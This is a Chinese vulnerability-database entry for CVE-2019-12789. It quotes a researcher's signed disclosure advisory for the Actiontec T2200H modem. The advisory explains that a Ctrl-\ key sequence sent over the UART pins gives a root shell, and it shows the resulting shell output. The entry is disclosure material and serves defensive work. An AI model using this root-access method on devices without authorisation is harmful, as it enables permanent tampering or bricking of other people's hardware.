Actiontec T2200H 安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1632411 漏洞类型 权限许可和访问控制问题
发布时间 2019-06-13 更新时间 2019-06-21
CVE编号 CVE-2019-12789 CNNVD-ID CNNVD-201906-654
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019060076
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201906-654
|漏洞详情
Actiontec Electronics T2200H是美国Actiontec Electronics公司的一款调制解调器。 Actiontec Electronics T2200H T2200H-31.128L.08版本中存在安全漏洞。攻击者可利用该漏洞获取带有root权限的shell,永久性的修改设备,包括:阻止自动更新,在设备上安装恶意代码等。
|漏洞EXP
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

###  Device Details
Discovered By: Andrew Klaus (andrew@aklaus.ca)
Vendor: Actiontec (Telus Branded)
Model: T2200H
Affected Firmware: T2200H-31.128L.08
Device Manual:
http://static.telus.com/common/cms/files/internet/telus_t2200h_user_manu
al.pdf

Reported: Sept 2018
CVE: CVE-2019-12789

The Telus Actiontec T2200H is bonded VDSL2 modem. It
incorporates 2 VDSL2 bonded links with a built-in firewall, bridge mode,
802.11bgn wireless, etc.

###   Summary of Findings

By attaching an adapter, such as a Raspberry Pi or other UART adpter,
 to the UART pins on the system board, an attacker can use a special
key sequence (Ctrl-\) to obtain a shell with root privileges at the
login prompt.

After gaining root access, the attacker can mount the linux /dev/md*
jffs2 partitions read-write and make permanent modifications to the
device including disabling features such as remote management, vendor
updating, etc. It can also be used to overwrite the flash storage,
permanently bricking the device.

Other note: I was also able to cross-compile a new full-functionality
BusyBox binary using https://buildroot.org/. By plugging in a USB Mass
Storage Device on the rear of the modem, I was able to dump the firmware
using “busybox dd”.

### PoC (UART output)
Login:
Password:  (Ctrl+\)
….
(Long stack trace)
….
#
# cat /etc/image_version
T2200H-311288BGW1521450


# ps aux
  PID USER       VSZ STAT COMMAND
   233 admin     1980 R    -/bin/sh
  251 admin        0 DW<  [kthread]
  269 admin        0 SW   [kpAliveWatchdog]
  301 admin        0 SW   [bcmsw]
  302 admin        0 SW   [bcmsw_timer]
  355 500       2344 S    /bin/dbus-daemon --system
  372 admin     1976 S    syslogd -n -C -l 5
  373 admin     1952 S    klogd -n
  911 admin     1732 S    /bin/wlevt
 1041 admin        0 SW   [dsl0]
 1273 admin     7084 S    swmdk
 1401 admin     1800 S    ./pmd
 1451 admin     5304 S    smbd -D
 1540 admin     7084 S    swmdk
 1541 admin     7084 S    swmdk
 1544 admin     7084 S    swmdk
 1569 admin     5304 S    smbd -D
 1661 admin     1304 S    /bin/lld2d br0
 1785 admin     1240 S    /bin/eapd
 1803 admin     1676 S    /bin/nas
 2129 admin     1344 S    /bin/acsd
 2175 admin     3132 R    /bin/wps_monitor
 2262 admin     3916 S    ./data_center
 5941 admin     2924 S    dhcp6s -c /var/dhcp6s.conf br0
 6018 admin      896 S    radvd -C /var/radvd.conf

# mount
rootfs on / type rootfs (rw)
mtd:rootfs on / type jffs2 (ro,relatime)
proc on /proc type proc (rw,relatime)
tmpfs on /var type tmpfs (rw,relatime,size=420k)
tmpfs on /mnt type tmpfs (rw,relatime,size=16k)
sysfs on /sys type sysfs (rw,relatime)
mtd:data on /data type jffs2 (rw,relatime)




-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEE/rRUDraOzqmrp8tZoyRid8jQfpkFAlz+o4YACgkQoyRid8jQ
fpmpew//TgspXRJd2FDlrzMH1HVamuKgu5GJWld2HhDSzFKf4geJ514S9w2vgb9n
0QqB0lm9mrz6dk0GyjlorxwxFot2r0RjW90Bwu1Zo0uLNp8iG2aJGDTY6km7UufS
QSSmSUaZot8E/x1UqZpRcbyBjdfJc8X11aHorHXq7j7UQYvmD1vcujM180zxb8eE
+8kHFNG1u77PjFH824hVdtfQj2Jq++yzpIf3WJsidmMqzS/a5af7BePHgO5upXyC
SL5sh5KMaGjJq/rfGr+V8/JL8ClHqQ61IX0qnkzCNMdis0ZVEfGp42GcauEn6Kd2
iyJNJEq6MmQ3wGd0INsTcCMwj4nCBxEyDougZD2gBxTgMBqcWrZo1PlzISWLmhcE
KFjqIBlVOvCXURh0cT+6lRsmAYdywXnLq3qbzjpDeEoXemZ4lkxEQOztxnRzr66K
SJ2Jf2wTIzO0IFkT3xktqi5VyloqUniigcZb9reK5ou1/c3Kn9kdYzsnPGokMdlk
75HXO31cDQJCLrLh2OmpoZP0Wle8+mkFengMoMBkxsi4DqHa9tcnqxZXf8zJYc6j
cd4f6SZjHOmV3uphqlLpgLIvBegF1cPESeMqPaLg6m9kpQSp5BbQGz9nMK22Do6+
sBaH/+4H1fRbVgppKbuuI8Xe4qCqCrvlaPd8nMS5x8IUBhSvySo=
=uXY3
-----END PGP SIGNATURE-----


|参考资料

来源:www.actiontec.com

链接:https://www.actiontec.com/blog/


来源:seclists.org

链接:http://seclists.org/fulldisclosure/2019/Jun/10


来源:nvd.nist.gov

链接:https://nvd.nist.gov/vuln/detail/CVE-2019-12789